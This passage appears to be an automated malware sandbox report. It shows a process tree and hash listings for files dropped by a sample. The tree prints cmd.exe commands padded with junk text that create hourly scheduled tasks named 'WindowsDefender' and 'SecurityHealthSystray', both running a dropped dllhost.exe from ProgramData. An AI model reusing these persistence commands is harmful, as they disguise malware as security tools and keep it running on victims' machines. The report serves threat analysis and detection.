C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo вкрр & SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo оКW3p14XUдlгПcx3⤵PID:676
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f4⤵
- Creates scheduled task(s)
PID:3972
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo Ю8ИжЩ5uzJзkX4юbq & SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo mLvйН3⤵PID:2148
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f4⤵
- Creates scheduled task(s)
PID:4420
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 5162⤵
- Program crash
PID:3244
-
-
C:\ProgramData\Dllhost\dllhost.exeC:\ProgramData\Dllhost\dllhost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4368
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
62KB
MD5e72d497c94bb1ed882ac98931f70e82e
SHA185c2c44e4addbdde87b49b33e252772126f9544e
SHA256d2e371810e8c7b1e039a02a578b1af0c6250665e85206b97a1ecb71aa5568443
SHA51278c71c5dc299146358140498d77a162e05265e40041aabdec0fd1a18624278117032f1a62918d1041b430dac3664658a37ec49fe2de5bae3bfe6d6cb7a5c3c4e
-
Filesize
62KB
MD5e72d497c94bb1ed882ac98931f70e82e
SHA185c2c44e4addbdde87b49b33e252772126f9544e
SHA256d2e371810e8c7b1e039a02a578b1af0c6250665e85206b97a1ecb71aa5568443
SHA51278c71c5dc299146358140498d77a162e05265e40041aabdec0fd1a18624278117032f1a62918d1041b430dac3664658a37ec49fe2de5bae3bfe6d6cb7a5c3c4e
-
Filesize
62KB
MD5e72d497c94bb1ed882ac98931f70e82e
SHA185c2c44e4addbdde87b49b33e252772126f9544e
SHA256d2e371810e8c7b1e039a02a578b1af0c6250665e85206b97a1ecb71aa5568443
SHA51278c71c5dc299146358140498d77a162e05265e40041aabdec0fd1a18624278117032f1a62918d1041b430dac3664658a37ec49fe2de5bae3bfe6d6cb7a5c3c4e
-
Filesize
7.8MB
MD55385a40c6af4c73f43cfa5de46b9f05a
SHA1aec914b73e3c7b4efe0971d1a87e62de2b0776a4
SHA25621bc43587dc1f19ec6271e69fe709b18fdefdfbfc5971a3edf00e92cb1b77995
SHA5122273c25dcd4eb20c5cdf2d941a523362a680bbb341f2b64dcd17bbc40e66e60b2319fa0804cfa6303299b17ed6cd8d57b7e8efb465417b680370d922d8c89dd7
-
Filesize
7.8MB
MD55385a40c6af4c73f43cfa5de46b9f05a
SHA1aec914b73e3c7b4efe0971d1a87e62de2b0776a4
SHA25621bc43587dc1f19ec6271e69fe709b18fdefdfbfc5971a3edf00e92cb1b77995
SHA5122273c25dcd4eb20c5cdf2d941a523362a680bbb341f2b64dcd17bbc40e66e60b2319fa0804cfa6303299b17ed6cd8d57b7e8efb465417b680370d922d8c89dd7
-
Filesize
7.8MB
MD55385a40c6af4c73f43cfa5de46b9f05a
SHA1aec914b73e3c7b4efe0971d1a87e62de2b0776a4
SHA25621bc43587dc1f19ec6271e69fe709b18fdefdfbfc5971a3edf00e92cb1b77995
SHA5122273c25dcd4eb20c5cdf2d941a523362a680bbb341f2b64dcd17bbc40e66e60b2319fa0804cfa6303299b17ed6cd8d57b7e8efb465417b680370d922d8c89dd7
-
Filesize
7.8MB
MD55385a40c6af4c73f43cfa5de46b9f05a
SHA1aec914b73e3c7b4efe0971d1a87e62de2b0776a4
SHA25621bc43587dc1f19ec6271e69fe709b18fdefdfbfc5971a3edf00e92cb1b77995
SHA5122273c25dcd4eb20c5cdf2d941a523362a680bbb341f2b64dcd17bbc40e66e60b2319fa0804cfa6303299b17ed6cd8d57b7e8efb465417b680370d922d8c89dd7
-
Filesize
7.8MB
MD55385a40c6af4c73f43cfa5de46b9f05a
SHA1aec914b73e3c7b4efe0971d1a87e62de2b0776a4
SHA25621bc43587dc1f19ec6271e69fe709b18fdefdfbfc5971a3edf00e92cb1b77995
SHA5122273c25dcd4eb20c5cdf2d941a523362a680bbb341f2b64dcd17bbc40e66e60b2319fa0804cfa6303299b17ed6cd8d57b7e8efb465417b680370d922d8c89dd7
-
Filesize
7.8MB
MD55385a40c6af4c73f43cfa5de46b9f05a
SHA1aec914b73e3c7b4efe0971d1a87e62de2b0776a4
SHA25621bc43587dc1f19ec6271e69fe709b18fdefdfbfc5971a3edf00e92cb1b77995
SHA5122273c25dcd4eb20c5cdf2d941a523362a680bbb341f2b64dcd17bbc40e66e60b2319fa0804cfa6303299b17ed6cd8d57b7e8efb465417b680370d922d8c89dd7
-
Filesize
343B
MD55a2812b775b17bc721ec808fe46cccdc
SHA1b186895e093bffa131a3a7f936d75c8314f7ae2f
SHA25672e122375917d4465af3bcd15d2dc5e0f6cb96a3a2f1fa5681d4fd512de79bba
SHA5128693113b17a106f73cc3563dc8894d65a6a215d5de72547bf64791b04f734749c34b242a0c87651d1374eb30938ec134ce120fe4fb15292dffa44b294c9afce7
-
Filesize
2KB
MD5db01a2c1c7e70b2b038edf8ad5ad9826
SHA1540217c647a73bad8d8a79e3a0f3998b5abd199b
SHA256413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d
SHA512c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6
-
Filesize
44KB
MD57247129cd0644457905b7d6bf17fd078
SHA1dbf9139b5a1b72141f170d2eae911bbbe7e128c8
SHA256dfa6e0d79449f29310b2a0400dc7fa5a3a6b08182233147a81902d1f80a0f8e4
SHA5129b1ebd7fe485811f10ec02778d90a7f7eccafa0231027b640b94eaed8408107051da7fcc4f17a9aa0eef900fa2595f44be7fd115331fb6da9b10076f5fcf87e0
-
Filesize
44KB
MD57247129cd0644457905b7d6bf17fd078
SHA1dbf9139b5a1b72141f170d2eae911bbbe7e128c8
SHA256dfa6e0d79449f29310b2a0400dc7fa5a3a6b08182233147a81902d1f80a0f8e4
SHA5129b1ebd7fe485811f10ec02778d90a7f7eccafa0231027b640b94eaed8408107051da7fcc4f17a9aa0eef900fa2595f44be7fd115331fb6da9b10076f5fcf87e0
-
Filesize
44KB
MD57247129cd0644457905b7d6bf17fd078
SHA1dbf9139b5a1b72141f170d2eae911bbbe7e128c8
SHA256dfa6e0d79449f29310b2a0400dc7fa5a3a6b08182233147a81902d1f80a0f8e4
SHA5129b1ebd7fe485811f10ec02778d90a7f7eccafa0231027b640b94eaed8408107051da7fcc4f17a9aa0eef900fa2595f44be7fd115331fb6da9b10076f5fcf87e0
-
Filesize
45KB
MD56faff0ebd7c3554b8b1b66bdc7a8ed7f
SHA1cc38cfcd0b4265eb2200f105c9ae46b3809beb72
SHA256b5cf2e1865f49c705491963f07bbf48cd3a863e42e73c7f84b99e3edca282c3a
SHA512ab424cc9603699a5285b75527892cd20ca3209cc01c4191171e7463d149434bd877c5b2a34443bc44e7502b58e35e2ecafd56bfef8f5d496e2aea2037f7b439d
-
Filesize
45KB
MD50b5d94d20be9eecbaed3dddd04143f07
SHA1c677d0355f4cc7301075a554adc889bce502e15a
SHA2563c6f74219d419accdd3de0d14fa46ff290fd430eddcc5352deddd7de59b4928c
SHA512395e5d0f28819f773b8d53363b7df73cc976124d1accce104390fdb3f5ebf57d8bb357e616910c03e1a9d67985704592640e442bd637009e32086bb1b2088916
-
Filesize
18KB
MD5ea27e80a0b3f8c58459001a9a7bad2ca
SHA1b7214538d54eb18fc2373b6eb30d06bee2cb7d57
SHA25651085469ecb1042813fceacb1376d98fe6cd72e3596fcc4342ddb8b2f6f20419
SHA512da0afe8520896588fbc8a14baf45f10deaaed646d72c5035a1ce8ab3907bb160379bdfef00f461ff66d563e725aee4c7df22821fb168fdc370b312f0596b892f
-
Filesize
18KB
MD5ea27e80a0b3f8c58459001a9a7bad2ca
SHA1b7214538d54eb18fc2373b6eb30d06bee2cb7d57
SHA25651085469ecb1042813fceacb1376d98fe6cd72e3596fcc4342ddb8b2f6f20419
SHA512da0afe8520896588fbc8a14baf45f10deaaed646d72c5035a1ce8ab3907bb160379bdfef00f461ff66d563e725aee4c7df22821fb168fdc370b312f0596b892f
-
Filesize
18KB
MD55664693aad18d91a43572d95f40a9ac2
SHA18afab3af415fa085f9c22ceb75661d227775286b
SHA256711c4357e982cc07cea83064e2e4399fd6e54ee924660fc2d0acfc30f0a5085b
SHA51254ee75c6cb947987c735d81bf0ec5b792364fb6176c5ced9c398b80d207a31899a2e623af7e43e386c4955f91e988798e80ec102d32f7b6e514b1602c0d99d9e
-
Filesize
18KB
MD55664693aad18d91a43572d95f40a9ac2
SHA18afab3af415fa085f9c22ceb75661d227775286b
SHA256711c4357e982cc07cea83064e2e4399fd6e54ee924660fc2d0acfc30f0a5085b
SHA51254ee75c6cb947987c735d81bf0ec5b792364fb6176c5ced9c398b80d207a31899a2e623af7e43e386c4955f91e988798e80ec102d32f7b6e514b1602c0d99d9e
-
Filesize
18KB
MD5c889938217bb76ffe7d44b488d5004fa
SHA183b2517524c45714af5b4637656eed80e22ae153
SHA2565c683fd12b56ac4e182668c28a7565f8a52b227c65a1ad3a211c0b3706e32bd2
SHA512a2dba413dd59e7feba6ecee17fa0878c213e3ea0e2b50e02d9ace20120a885a4b6524fe6209d3fcc2a1bece2fd5f593ec0e393bca0c6f592eddb3c5778aa6973
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a